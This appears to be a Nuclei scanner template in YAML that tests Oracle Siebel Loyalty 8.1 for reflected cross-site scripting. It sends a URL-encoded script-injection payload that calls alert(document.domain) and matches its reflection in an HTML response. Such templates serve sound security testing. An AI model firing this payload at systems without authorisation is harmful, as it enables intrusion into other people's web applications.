29 lines
680 B
YAML
29 lines
680 B
YAML
id: oracle-siebel-xss
|
|
|
|
info:
|
|
name: Oracle Siebel Loyalty 8.1 - XSS Vulnerability
|
|
author: dhiyaneshDK
|
|
severity: medium
|
|
reference: https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html
|
|
tags: xss,oracle
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '</script><script>alert(document.domain)</script>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|